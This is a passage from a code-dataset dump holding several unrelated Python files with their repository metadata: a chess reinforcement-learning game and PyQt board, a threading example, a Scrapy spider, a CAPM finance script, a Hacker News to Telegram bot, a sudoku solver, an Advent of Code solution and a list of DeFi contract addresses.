pass\n\n def getInitBoard(self):\n # return initial board (numpy board)\n return chess.Board()\n\n def getBoardSize(self):\n # (a,b) tuple\n # 6 piece type\n return (8, 8, 6)\n\n def toArray(self, board):\n return to_np(board)\n\n def getActionSize(self):\n # return number of actions\n return 64 * 64\n # return self.n*self.n*16+1\n\n def getNextState(self, board, player, action):\n # if player takes action on board, return next (board,player)\n # action must be a valid move\n assert (who(board.turn) == player)\n move = to_move(action)\n\n if not board.turn:\n # assume the move comes from the canonical board...\n move = mirror_move(move)\n if move not in board.legal_moves:\n # could be a pawn promotion, which has an extra letter in UCI format\n move = chess.Move.from_uci(move.uci() + 'q') # assume promotion to queen\n if move not in board.legal_moves:\n assert False, \"%s not in %s\" % (str(move), str(list(board.legal_moves)))\n board = board.copy()\n board.push(move)\n return (board, who(board.turn))\n\n def getValidMoves(self, board, player):\n # return a fixed size binary vector\n assert (who(board.turn) == player)\n acts = [0] * self.getActionSize()\n for move in board.legal_moves:\n acts[from_move(move)] = 1\n return np.array(acts)\n\n def getGameEnded(self, board, player):\n # return 0 if not ended, 1 if player 1 won, -1 if player 1 lost\n outcome = board.outcome()\n if outcome is not None:\n if outcome.winner is None:\n # draw return very little value\n return 1e-4\n else:\n return who(outcome.winner)\n return 0\n\n def getCanonicalForm(self, board, player):\n # return state if player==1, else return -state if player==-1\n assert (who(board.turn) == player)\n if board.turn:\n return board\n else:\n return board.mirror()\n\n def getSymmetries(self, board, pi):\n # mirror, rotational\n return [(board, pi)]\n\n def stringRepresentation(self, board):\n return board.fen()\n\n @staticmethod\n def display(board):\n print(board)\n\n\n# import chess\n# import chess.svg\n#\n# from PyQt5.QtSvg import QSvgWidget\n# from PyQt5.QtWidgets import QApplication, QWidget\n#\n#\n# class MainWindow(QWidget):\n# def __init__(self, board=chess.Board()):\n# super().__init__()\n#\n# self.setGeometry(100, 100, 1000, 1000)\n#\n# self.widgetSvg = QSvgWidget(parent=self)\n# self.widgetSvg.setGeometry(10, 10, 980, 980)\n#\n# self.chessboard = board\n#\n# self.chessboardSvg = chess.svg.board(self.chessboard).encode(\"UTF-8\")\n# self.widgetSvg.load(self.chessboardSvg)\n#\n# def nextMove(self, event):\n# self.chessboard.push(event)\n# self.chessboardSvg = chess.svg.board(self.chessboard).encode(\"UTF-8\")\n# self.widgetSvg.load(self.chessboardSvg)\n# self.widgetSvg.update()\n\n# def paintEvent(self, event):\n# self.chessboard.push(event)\n# self.chessboardSvg = chess.svg.board(self.chessboard).encode(\"UTF-8\")\n# self.widgetSvg.load(self.chessboardSvg)\n\n\nimport chess\nimport chess.svg\nfrom PyQt5.QtCore import pyqtSignal, pyqtSlot, Qt\nfrom PyQt5.QtSvg import QSvgWidget\nfrom PyQt5.QtWidgets import QDialog, QWidget, QRadioButton, QPushButton, QButtonGroup, QGroupBox, QHBoxLayout, \\\n QVBoxLayout\nimport sys\n\n\nclass ChessBoard(QWidget, chess.Board):\n \"\"\"\n BRIEF An interactive chessboard that only allows legal moves\n \"\"\"\n\n ReadyForNextMove = pyqtSignal(str)\n GameOver = pyqtSignal()\n\n def __init__(self, parent=None):\n \"\"\"\n BRIEF Initialize the chessboard\n \"\"\"\n super().__init__(parent)\n self.setWindowTitle(\"Chess\")\n\n self.svg_xy = 50 # top left x,y-pos of chessboard\n self.board_size = 600 # size of chessboard\n self.margin = 0.05 * self.board_size\n self.square_size = (self.board_size - 2 * self.margin) / 8.0\n wnd_wh = self.board_size + 2 * self.svg_xy\n\n self.setMinimumSize(wnd_wh, wnd_wh)\n self.svg_widget = QSvgWidget(parent=self)\n self.svg_widget.setGeometry(self.svg_xy, self.svg_xy, self.board_size, self.board_size)\n\n self.last_click = None\n self.DrawBoard()\n\n @pyqtSlot(QWidget)\n def mousePressEvent(self, event):\n \"\"\"\n BRIEF Update the board state based on user clicks\n If the state changes, update the svg widget\n \"\"\"\n if self.LeftClickedBoard(event):\n this_click = self.GetClicked(event)\n\n if self.last_click:\n if self.last_click != this_click:\n uci = self.last_click + this_click\n self.ApplyMove(uci + self.GetPromotion(uci))\n self.last_click = this_click\n\n def GetPromotion(self, uci):\n \"\"\"\n BRIEF Get the uci piece type the pawn will be promoted to\n \"\"\"\n if chess.Move.from_uci(uci + 'q') in self.legal_moves:\n dialog = PromotionDialog(self)\n if dialog.exec() == QDialog.Accepted:\n return dialog.SelectedPiece()\n return ''\n\n @pyqtSlot(str)\n def ApplyMove(self, uci):\n \"\"\"\n BRIEF Apply a move to the board\n \"\"\"\n move = chess.Move.from_uci(uci)\n if move in self.legal_moves:\n self.push(move)\n self.DrawBoard()\n\n print(self.fen())\n if not self.is_game_over():\n self.ReadyForNextMove.emit(self.fen())\n else:\n print(\"Game over!\")\n self.GameOver.emit()\n sys.stdout.flush()\n\n\n def DrawBoard(self):\n \"\"\"\n BRIEF Redraw the chessboard based on board state\n Highlight src and dest squares for last move\n Highlight king if in check\n \"\"\"\n self.svg_widget.load(self._repr_svg_().encode(\"utf-8\"))\n\n def GetClicked(self, event):\n \"\"\"\n BRIEF Get the algebraic notation for the clicked square\n \"\"\"\n top_left = self.svg_xy + self.margin\n file_i = int((event.x() - top_left) / self.square_size)\n rank_i = 7 - int((event.y() - top_left) / self.square_size)\n return chr(file_i + 97) + str(rank_i + 1)\n\n def LeftClickedBoard(self, event):\n \"\"\"\n BRIEF Check to see if they left-clicked on the chess board\n \"\"\"\n topleft = self.svg_xy + self.margin\n bottomright = self.board_size + self.svg_xy - self.margin\n return all([\n event.buttons() == Qt.LeftButton,\n topleft < event.x() < bottomright,\n topleft < event.y() < bottomright,\n ])\n\n\nclass PromotionDialog(QDialog):\n \"\"\"\n BRIEF A dialog used to decide what to promote a pawn to\n \"\"\"\n\n def __init__(self, parent=None):\n \"\"\"\n BRIF Initialize the dialog with buttons\n \"\"\"\n super().__init__(parent, Qt.WindowSystemMenuHint | Qt.WindowTitleHint)\n self.setWindowTitle(\"Promotion\")\n\n radio_q = QRadioButton(\"q\")\n radio_r = QRadioButton(\"r\")\n radio_b = QRadioButton(\"b\")\n radio_n = QRadioButton(\"n\")\n\n self.button_group = QButtonGroup()\n self.button_group.addButton(radio_q)\n self.button_group.addButton(radio_r)\n self.button_group.addButton(radio_b)\n self.button_group.addButton(radio_n)\n\n radio_q.setChecked(True)\n\n radio_h_layout = QHBoxLayout()\n radio_h_layout.addWidget(radio_q)\n radio_h_layout.addWidget(radio_r)\n radio_h_layout.addWidget(radio_b)\n radio_h_layout.addWidget(radio_n)\n\n group_box = QGroupBox()\n group_box.setLayout(radio_h_layout)\n\n ok_button = QPushButton(\"Ok\")\n cancel_button = QPushButton(\"Cancel\")\n\n ok_button.released.connect(self.accept)\n cancel_button.released.connect(self.reject)\n\n button_h_layout = QHBoxLayout()\n button_h_layout.addWidget(ok_button)\n button_h_layout.addWidget(cancel_button)\n\n v_layout = QVBoxLayout()\n v_layout.addWidget(group_box)\n v_layout.addLayout(button_h_layout)\n self.setLayout(v_layout)\n\n def SelectedPiece(self):\n \"\"\"\n BRIEF Get the uci piece type the user selected from the dialog\n \"\"\"\n return self.button_group.checkedButton().text()\n\n\n\nif __name__ == \"__main__\":\n \"\"\"\n BRIEF Test the ChessBoard class\n \"\"\"\n from PyQt5.QtWidgets import QApplication\n\n q_app = QApplication([])\n board = ChessBoard()\n board.show()\n\n\n q_app.exec()\n","repo_name":"Juravlik/chess_rl_ai","sub_path":"_chess/ChessGame.py","file_name":"ChessGame.py","file_ext":"py","file_size_in_byte":9731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37540227045","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 26 16:12:24 2018\r\n\r\n@author: surfcat\r\n\"\"\"\r\n\r\nimport pickle\r\n\r\nf = open('obj/' + 'calibrations_direct_CO_pressure_corrected_4' + '.pkl', 'rb')\r\nmamawebo = pickle.load(f)\r\nf.close()\r\n\r\nprint(mamawebo)","repo_name":"celiacailloux/PhD-Data-Analysis","sub_path":"GC/Old/gastonsucks.py","file_name":"gastonsucks.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33830095651","text":"import threading\nimport logging\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format='(%(threadName)-10s) %(message)s'\n)\n\n\n# make subclass of Thread\nclass MyThread(threading.Thread):\n def __init__(self, group=None, target=None, name=None,\n args=(), kwargs=None, *, daemon=None):\n # redefine constructor with the same signature\n # but make parent class private variable args and kwargs easy to access\n super().__init__(group=group, target=target, name=name,\n daemon=daemon)\n self.args = args,\n self.kwargs = kwargs\n\n def run(self) -> None:\n # override run\n logging.debug('running with {} and {}'.format(self.args, self.kwargs))\n\n\nif __name__ == '__main__':\n for i in range(3):\n t = MyThread(args=(i,), kwargs={'a': 'A', 'b': 'B'})\n t.start()\n","repo_name":"JPMike/Starter-Python","sub_path":"StandardLibrary/threading-example/threading_subclass.py","file_name":"threading_subclass.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15194558439","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass GithubSpider(scrapy.Spider):\n name = 'shiyanlou-github'\n\n @property\n def start_urls(self):\n return ('https://github.com/shiyanlou?tab=repositories', )\n\n def parse(self, response):\n for repository in response.css('li.public'):\n yield {\n 'name': repository.xpath('.//a[@itemprop=\"name codeRepository\"]/text()').re_first(r'\\n\\s*(.*)'),\n 'update_time': repository.xpath('.//relative-time/@datetime').extract_first()\n }\n","repo_name":"shiyanlou/louplus-python","sub_path":"Python 进阶挑战(旧)/10-crawl-github-user-repositories/githubspider.py","file_name":"githubspider.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":182,"dataset":"github-code","pt":"78"} +{"seq_id":"43758877712","text":"import pandas as pd\nimport numpy as np\nimport plotly.express as px\nimport pandas_datareader.data as web\nimport datetime as dt\n\n\n# ++++++++++++++++++++++++++ ( COLETANDO DADOS E MONTANDO EXEL ) ++++++++++++++++++++++++++++ #\ndia0 = dt.datetime(2015, 1, 1)\nfim = dt.datetime(2022, 7, 7)\nlist = ['GGBR4.SA', 'BBDC4.SA', 'EMBR3.SA', 'ENBR3.SA', 'PETR4.SA', 'BOVA11.SA']\ndf = web.DataReader(list, 'yahoo', dia0, fim)['Adj Close']\nwriter = pd.ExcelWriter('dados.xlsx', engine='xlsxwriter')\ndf.to_excel(writer, sheet_name='Sheet1')\nwriter.save()\n\n# ++++++++++++++++++++++++++ ( CRIANDO TABELAS COM DADOS ORGANIZADOS DA MANEIRA DESEJADA ) +++++++++++++++++++++++++++ #\ndataset = pd.read_excel('dados.xlsx', sheet_name='Sheet1')\n\ndataset.drop(labels=['Date'], axis=1, inplace=True)\ndataset_normalizado = dataset.copy()\nfor i in dataset.columns:\n dataset_normalizado[i] = dataset[i] / dataset[i][0]\nprint('Dados Normalizados:', dataset_normalizado)\n\ndataset_taxa_retorno = (dataset_normalizado / dataset_normalizado.shift(1)) - 1\nprint('Taxa de Retorno: ', dataset_taxa_retorno)\n\ndataset_taxa_retorno.fillna(0, inplace=True)\nprint('Taxas de Retorno:', dataset_taxa_retorno.head())\n\nprint('Taxa de Retorno anual:')\nprint(dataset_taxa_retorno.mean() * 246)\n\n# ++++++++++++++++++++++++++ ( BETA com REGRESSÃO LINEAR ) ++++++++++++++++++++++++++++ #\nfigura = px.scatter(dataset_taxa_retorno, x='BOVA11.SA', y='BBDC4.SA', title='BOVA x MGLU')\nfigura.show()\n\nbeta, alpha = np.polyfit(x=dataset_taxa_retorno['BOVA11.SA'], y=dataset_taxa_retorno['BBDC4.SA'], deg=1)\n\nprint('beta:', beta, 'alpha:', alpha, 'alpha (%):', alpha * 100)\n\nfigura = px.scatter(dataset_taxa_retorno, x='BOVA11.SA', y='BBDC4.SA', title='BOVA11.SA x BBDC4.SA')\nfigura.add_scatter(x=dataset_taxa_retorno['BOVA11.SA'], y=beta * dataset_taxa_retorno['BOVA11.SA'] + alpha)\nfigura.show()\n\n# ++++++++++++++++++++++++++ ( BETA com COV ) ++++++++++++++++++++++++++++ #\n# ELE RETIRA OS ATIVOS QUE NAO QUER ANALISAR\nmatriz_covariancia = dataset_taxa_retorno.drop(columns=['GGBR4.SA', 'EMBR3.SA', 'ENBR3.SA', 'PETR4.SA']).cov() * 246\nprint(matriz_covariancia)\n\ncov_bbdc_bova = matriz_covariancia.iloc[1, 0]\nprint('Covariância BOVA x BBDC:', cov_bbdc_bova)\n\nvariancia_bova = dataset_taxa_retorno['BOVA11.SA'].var() * 246\nprint('Variância BOVA:', variancia_bova)\n\nbeta_bbdc = cov_bbdc_bova / variancia_bova\nprint('BETA BBDC: ', beta_bbdc)\n# ++++++++++++++++++++++++++ ( CAPM para 1 único ativo ) ++++++++++++++++++++++++++++ #\n\nrm = dataset_taxa_retorno['BOVA11.SA'].mean() * 246\nprint('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\nprint(rm)\n\ntaxa_selic_historico = np.array([12.75, 14.25, 12.25, 6.5, 5.0, 2.0, 9.15])\nrf = taxa_selic_historico.mean() / 100\nprint('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\nprint(rf)\n\ncapm_bbdc = rf + (beta * (rm - rf))\nprint('CAPM do BBDC4: ', capm_bbdc)\n\n# ++++++++++++++++++++++++++ ( BETA para todos os ativos ) ++++++++++++++++++++++++++++ #\n\nbetas = []\nalphas = []\n\nprint('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\nfor ativo in dataset_taxa_retorno.columns[0:-1]:\n\n beta, alpha = np.polyfit(dataset_taxa_retorno['BOVA11.SA'], dataset_taxa_retorno[ativo], 1)\n betas.append(beta)\n alphas.append(alpha)\n\n\ndef visualiza_betas_alphas(betas, alphas):\n for i, ativo in enumerate(dataset_taxa_retorno.columns[0:-1]):\n print(ativo, 'beta:', betas[i], 'alpha:', alphas[i] * 100)\n\n\nvisualiza_betas_alphas(betas, alphas)\nprint('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\nprint('Alpha médio: ', np.array(alphas).mean() * 100)\n\n# ++++++++++++++++++++++++++ ( CAPM para Portfólio ) ++++++++++++++++++++++++++++ #\ncapm_empresas = []\nfor i, ativo in enumerate(dataset_taxa_retorno.columns[0:-1]):\n\n capm_empresas.append(rf + (betas[i] * (rm - rf)))\n\n\ndef visualiza_capm(capm):\n for c, ativo in enumerate(dataset_taxa_retorno.columns[0:-1]):\n print(ativo, 'CAPM:', capm[c] * 100)\n\n\nvisualiza_capm(capm_empresas)\n# DEFINIR PESOS PORTFOLIO ABAIXO\npesos = np.array([0.2, 0.2, 0.2, 0.2, 0.2])\n\ncapm_portfolio = np.sum(capm_empresas * pesos) * 100\nprint('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\nprint('CAPM do porfólio: ', capm_portfolio)\n","repo_name":"LeoLomardo/PythonMercadoFinanceiro","sub_path":"RegreLinear.py","file_name":"RegreLinear.py","file_ext":"py","file_size_in_byte":4394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"71986071611","text":"# coding: utf-8\n\nimport datetime\nimport logging\n\nimport timeago\nfrom sqlalchemy import Column, DateTime, Integer, String, Text, create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import Session\n\nfrom .telegram import TelegramBot\n\nFOUR_HOURS = datetime.timedelta(hours=4)\nTWO_DAYS = datetime.timedelta(days=2)\n\n\nBase = declarative_base()\n\n\nclass StoryPost(Base):\n __tablename__ = \"story_post\"\n\n id = Column(String, primary_key=True) # Assuming 'id' is a string\n title = Column(String)\n text = Column(Text)\n message = Column(Text)\n url = Column(Text)\n story_url = Column(Text)\n hn_url = Column(Text)\n score = Column(Integer)\n telegram_message_id = Column(Integer)\n created = Column(DateTime, default=datetime.datetime.utcnow)\n\n\nclass StoryHandler:\n def __init__(self, database_uri: str, telegram_bot: TelegramBot) -> None:\n self.engine = create_engine(database_uri)\n Base.metadata.create_all(self.engine)\n self.telegram_bot = telegram_bot\n\n def add_story(self, story):\n with Session(self.engine) as session:\n story_id_int = story.get(\"id\")\n story_id = str(story_id_int)\n hn_url = \"https://news.ycombinator.com/item?id={}\".format(story_id)\n story_url = story.get(\"url\")\n\n post = session.query(StoryPost).get(story_id)\n if post:\n logging.info(f\"STOP: {story_id} in DB\")\n return\n logging.info(\"SEND: {}\".format(story_id))\n\n story[\"title\"] = story.get(\"title\")\n comments_count = story.get(\"descendants\", 0)\n buttons = []\n\n if story_url:\n buttons.append({\"text\": \"Read\", \"url\": story_url})\n story[\"url\"] = hn_url\n\n buttons.append(\n {\"text\": \"{}+ Comments\".format(comments_count), \"url\": hn_url}\n )\n\n now = datetime.datetime.now()\n published = datetime.datetime.fromtimestamp(story.get(\"time\"))\n ago = timeago.format(now, published)\n\n # Add 🔥 emoji if story is hot and gained required score in less than 2 hours,\n # or add ❄️ if it took it more than 2 days\n status_emoji = \"\"\n delta = now - published\n if delta <= FOUR_HOURS:\n status_emoji = \"🔥 \"\n elif delta >= TWO_DAYS:\n status_emoji = \"❄️ \"\n\n # Add title\n message = (\n \"{title} ({status_emoji}Score: {score}+ {ago})\\n\\n\"\n .format(ago=ago, status_emoji=status_emoji, **story)\n )\n\n # Add link\n message += \"Link: {}\\n\".format(story_url)\n\n # Add comments Link(don't add it for `Ask HN`, etc)\n if story_url:\n message += \"Comments: {}\\n\".format(hn_url)\n\n # Add text\n text = story.get(\"text\")\n if text:\n text = (\n text.replace(\"

\", \"\\n\")\n .replace(\"'\", \"'\")\n .replace(\"/\", \"/\")\n )\n message += \"\\n{}\\n\".format(text)\n\n # Send to the telegram channel\n result = self.telegram_bot.send_message(\n message, {\"inline_keyboard\": [buttons]}\n )\n\n logging.info(\"Telegram response: {}\".format(result))\n\n telegram_message_id = None\n if result and result.get(\"ok\"):\n telegram_message_id = result.get(\"result\").get(\"message_id\")\n print(\"{id} pushed to channel ({score})\".format(**story))\n new_story = StoryPost(\n id=story_id,\n title=story.get(\"title\"),\n url=story_url,\n score=story.get(\"score\"),\n text=story.get(\"text\"),\n story_url=story_url,\n hn_url=hn_url,\n message=message,\n telegram_message_id=telegram_message_id,\n )\n session.add(new_story)\n session.commit()\n","repo_name":"davuses/HackerNewsHotBot","sub_path":"hackernews_hot/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"18646721655","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#sudoku solver\nfrom pprint import pprint\n\ndef find_next_empty(puzzle):\n #any open spaces will be marked as -1\n #this function will find the empty spaces for us\n for r in range(9):\n for c in range(9):\n if puzzle[r][c] == -1:\n return r,c\n \n return None, None # if no spaces in the puzzle are left\n\n############################################################\n# SOLVER IMPLEMENTATION\n############################################################\n\ndef is_valid(puzzle, guess, row, col):\n #figures is the guess is valid or not\n #returns valid if true and false otherwiswe\n row_vals= puzzle[row]\n if guess in row_vals:\n return False\n #now the cols\n col_vals=[]\n for i in range(9):\n col_vals.append(puzzle[i][col])\n if guess in col_vals:\n return False\n #and then the 3x3 squres \n #we need to know where the 3x3 index starts and where and iterate over the 3 values in the rows/cols\n row_start = (row // 3)*3\n col_start = (col // 3)*3 \n for r in range(row_start, row_start + 3):\n for c in range(col_start, col_start + 3):\n if puzzle[r][c] == guess:\n return False\n #if we get here then it is valid\n return True\n\n \n\ndef solve_sudoku(puzzle):\n row, col= find_next_empty(puzzle)\n # now we implement some validation checks\n if row == None:\n return True\n for guess in range (1,10):\n #check if this is valid guess\n if is_valid(puzzle, guess, row, col):\n # if the value is valid then we want to place the guess on the puzzle\n puzzle[row][col] = guess\n # recursively call our function\n if solve_sudoku(puzzle):\n return True\n #what if our guess doesn't solve the puzzle? We must backtrack and try again\n puzzle[row][col] = -1 #resets the guess\n \n #if every combination is tried and still not solved than this puzzle is unsolvable\n return False\n\nif __name__ == '__main__':\n example_board = [\n [3, 9, -1, -1, 5, -1, -1, -1, -1],\n [-1, -1, -1, 2, -1, -1, -1, -1, 5],\n [-1, -1, -1, 7, 1, 9, -1, 8, -1],\n\n [-1, 5, -1, -1, 6, 8, -1, -1, -1],\n [2, -1, 6, -1, -1, 3, -1, -1, -1],\n [-1, -1, -1, -1, -1, -1, -1, -1, 4],\n\n [5, -1, -1, -1, -1, -1, -1, -1, -1],\n [6, 7, -1, 1, -1, 5, -1, 4, -1],\n [1, -1, 9, -1, -1, -1, 2, -1, -1]\n ]\n print(solve_sudoku(example_board))\n pprint(example_board)\n \n \n\n","repo_name":"BurhanK2003/Sudoku-Solver","sub_path":"Sudoku Solver.py","file_name":"Sudoku Solver.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26799011103","text":"import collections\r\nfrom collections import defaultdict, Counter\r\nimport functools\r\nimport itertools\r\nfrom itertools import product, permutations, combinations\r\nimport bisect\r\nimport math\r\nfrom rich import print\r\nimport parse\r\nimport operator\r\nfrom heapq import heappop, heappush\r\n\r\n\r\ndef read_data(file_name):\r\n with open(file_name + \".txt\", \"r\", newline=None) as data:\r\n data = data.read().splitlines()\r\n return data\r\n\r\n\r\ndef parser(data):\r\n pattern = \"target area: x={x1:d}..{x2:d}, y={y2:d}..{y1:d}\"\r\n match = parse.search(pattern, data)\r\n return match.named\r\n\r\n\r\ndef part_test():\r\n data = read_data(\"test\")\r\n assert part_1(data) == 45\r\n assert part_2(data) == 112\r\n\r\n\r\ndef fox(y, y1, y2):\r\n yy = 0\r\n mx = 0\r\n steps = []\r\n i = 0\r\n while yy >= y2:\r\n i += 1\r\n yy += y\r\n y -= 1\r\n mx = max(yy, mx)\r\n if yy <= y1 and yy >= y2:\r\n steps.append(i)\r\n return steps\r\n\r\n\r\ndef foox(x, x1, x2):\r\n xx = 0\r\n steps = []\r\n i = 0\r\n while x:\r\n i += 1\r\n xx += x\r\n if x:\r\n x += 1 if x < 0 else -1\r\n if xx >= x1 and xx <= x2:\r\n steps.append(i)\r\n if not x and xx >= x1 and xx <= x2:\r\n for i in range(max(steps), max(steps) + 500):\r\n steps.append(i)\r\n return steps\r\n\r\n\r\ndef part_1(datat):\r\n data = datat[:][0]\r\n data = parser(data)\r\n return (data[\"y2\"] + 1) * data[\"y2\"] // 2\r\n\r\n\r\ndef part_2(datat):\r\n data = datat[:][0]\r\n data = parser(data)\r\n d = defaultdict(set)\r\n dx = defaultdict(int)\r\n s = set()\r\n for i in range(max(data[\"x2\"] * 2, data[\"y1\"] * 2)):\r\n r = foox(i, data[\"x1\"], data[\"x2\"])\r\n for k in r:\r\n s.add(k)\r\n d[k].add(i)\r\n dx[k] += 1\r\n\r\n dy = defaultdict(set)\r\n dyy = defaultdict(int)\r\n sy = set()\r\n for i in range(-100, 100):\r\n r = fox(\r\n i,\r\n data[\"y1\"],\r\n data[\"y2\"],\r\n )\r\n for k in r:\r\n sy.add(k)\r\n dy[k].add(i)\r\n dyy[k] += 1\r\n\r\n inter = s.intersection(sy)\r\n r = 0\r\n rs = set()\r\n for i in inter:\r\n per = itertools.product(d[i], dy[i])\r\n for j in per:\r\n rs.add(j)\r\n\r\n return len(rs)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n part_test()\r\n data = read_data(\"input\")\r\n print(part_1(data))\r\n print(part_2(data))\r\n","repo_name":"Cvaniak/AdventOfCode","sub_path":"2021/Day17/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"9245203740","text":"# pip3 install pandas numpy ast pycaret=2.3.3 tune-sklearn ray[tune] scikit-optimize\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport ast\r\nimport pycaret\r\nfrom pycaret.classification import *\r\nfrom pycaret.regression import *\r\n\r\ncontractDict = {\r\n \"0x1f9840a85d5af5bf1d1762f925bdaddc4201f984\": \"Uniswap: Uniswap Protocol: UNI Token\",\r\n \"0x7a250d5630b4cf539739df2c5dacb4c659f2488d\": \"Uniswap: Uniswap V2: Router 2\",\r\n \"0x090d4613473dee047c3f2706764f49e0821d256e\": \"Uniswap: Uniswap: Token Distributor\",\r\n \"0xc2edad668740f1aa35e4d8f227fb8e17dca888cd\": \"SushiSwap: SushiSwap: MasterChef LP Staking Pool\",\r\n \"0xd9e1ce17f2641f24ae83637ab66a2cca9c378b9f\": \"SushiSwap: SushiSwap: Router\",\r\n \"0x6b3595068778dd592e39a122f4f5a5cf09c90fe2\": \"SushiSwap: SushiSwap: SUSHI Token\",\r\n \"0x088ee5007c98a9677165d78dd2109ae4a3d04d0c\": \"SushiSwap: SushiSwap: YFI\",\r\n \"0x3e66b66fd1d0b02fda6c811da9e0547970db2f21\": \"Balancer: Balancer: Exchange Proxy 2\",\r\n \"0xba100000625a3754423978a60c9317c58a424e3d\": \"Balancer: Balancer: BAL Token\",\r\n \"0x9008D19f58AAbD9eD0D60971565AA8510560ab41\": \"CowSwap: Settlement Contract\",\r\n \"0x3328f5f2cEcAF00a2443082B657CedEAf70bfAEf\": \"CowSwap: OLD Settlement Contract\",\r\n \"0xe41d2489571d322189246dafa5ebde1f4699f498\": \"ZRX: ZRX Token\",\r\n \"0xd26114cd6EE289AccF82350c8d8487fedB8A0C07\": \"OMG Network: OMG Token\",\r\n \"0x111111111117dc0aa78b770fa6a738034120c302\": \"1INCH: 1INCH Token\",\r\n \"0x3A8cCCB969a61532d1E6005e2CE12C200caeCe87\": \"TitanSwap: Titan Token\",\r\n \"0x6c28AeF8977c9B773996d0e8376d2EE379446F2f\": \"Quickswap: QUICK Token\",\r\n \"0xdd974d5c2e2928dea5f71b9825b8b646686bd200\": \"Kyber: Old KNC Token\",\r\n \"0x9aab3f75489902f3a48495025729a0af77d4b11e\": \"Kyber: Kyber Proxy 2\",\r\n \"0xecf0bdb7b3f349abfd68c3563678124c5e8aaea3\": \"Kyber: Kyber Staking\",\r\n \"0xdeFA4e8a7bcBA345F687a2f1456F5Edd9CE97202\": \"Kyber: Kyber Network Crystal v2\",\r\n \"0xbbbbca6a901c926f240b89eacb641d8aec7aeafd\": \"Loopring: LRC Token\",\r\n \"0x0baba1ad5be3a5c0a66e7ac838a129bf948f1ea4\": \"Loopring: Exchange V2\",\r\n \"0xf4662bb1c4831fd411a95b8050b3a5998d8a4a5b\": \"Loopring: Staking Pool\",\r\n \"0x7fc66500c84a76ad7e9c93437bfc5ac33e2ddae9\": \"Aave: AAVE Token\",\r\n \"0x7d2768de32b0b80b7a3454c06bdac94a69ddc7a9\": \"Aave: Aave: Lending Pool V2\",\r\n \"0xdcd33426ba191383f1c9b431a342498fdac73488\": \"Aave: WETH Gateway\",\r\n \"0x030ba81f1c18d280636f32af80b9aad02cf0854e\": \"Aave: aWETH Token\",\r\n \"0xbcca60bb61934080951369a648fb03df4f96263c\": \"Aave: aUSDC Token\",\r\n \"0x028171bca77440897b824ca71d1c56cac55b68a3\": \"Aave: aDAI Token\",\r\n \"0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b\": \"Compound: Compcontroller\",\r\n \"0xc00e94cb662c3520282e6f5717214004a7f26888\": \"Compound: COMP Token\",\r\n \"0x6b175474e89094c44da98b954eedeac495271d0f\": \"Maker: Dai Stablecoin\",\r\n \"0x9f8f72aa9304c8b593d555f12ef6589cc3a579a2\": \"Maker: Maker Token\",\r\n \"0x4c19596f5aaff459fa38b0f7ed92f11ae6543784\": \"TrueFi: TrueFi Token\",\r\n \"0x2ba592f78db6436527729929aaf6c908497cb200\": \"CREAM Finance: CREAM Token\",\r\n \"0x3d5bc3c8d13dcb8bf317092d84783c2697ae9258\": \"CREAM Finance: Comptroller\",\r\n \"0xc011a73ee8576fb46f5e1c5751ca3b9fe0af2a6f\": \"Synthetix: SNX Token\",\r\n \"0xb440dd674e1243644791a4adfe3a2abb0a92d309\": \"Synthetix: Fee Pool\",\r\n \"0xd7c49cee7e9188cca6ad8ff264c1da2e69d4cf3b\": \"Nexus Mutual: NXM Token\",\r\n \"0x84edffa16bb0b9ab1163abb0a13ff0744c11272f\": \"Nexus Mutual: Pooled Staking\",\r\n \"0x1e0447b19bb6ecfdae1e4ae1694b0c3659614e4e\": \"dYdX: Solo Margin\",\r\n \"0xa8b39829ce2246f89b31c013b8cde15506fb9a76\": \"dYdX: Pay Proxy for Solo Margin\",\r\n \"0xd54f502e184b6b739d7d27a6410a67dc462d69c8\": \"dYdX: L2 Perp Smart Contract\",\r\n \"0x09403fd14510f8196f7879ef514827cd76960b5d\": \"dYdX: Perp Proxy\",\r\n \"0x8129b737912e17212c8693b781928f5d0303390a\": \"dYdX: L2 On-Chain Operator\",\r\n \"0x39246c4f3f6592c974ebc44f80ba6dc69b817c71\": \"Opyn: Options Exchange\",\r\n \"0xcc5d905b9c2c8c9329eb4e25dc086369d6c7777c\": \"Opyn: Options Factory\",\r\n \"0x6123b0049f904d730db3c36a31167d9d4121fa6b\": \"Ribbon Finance: RBN Token\",\r\n \"0x722122df12d4e14e13ac3b6895a86e84145b6967\": \"Tornado Cash: Tornado Cash Proxy\",\r\n \"0x77777feddddffc19ff86db637967013e6c6a116c\": \"Tornado Cash: TORN Token\",\r\n 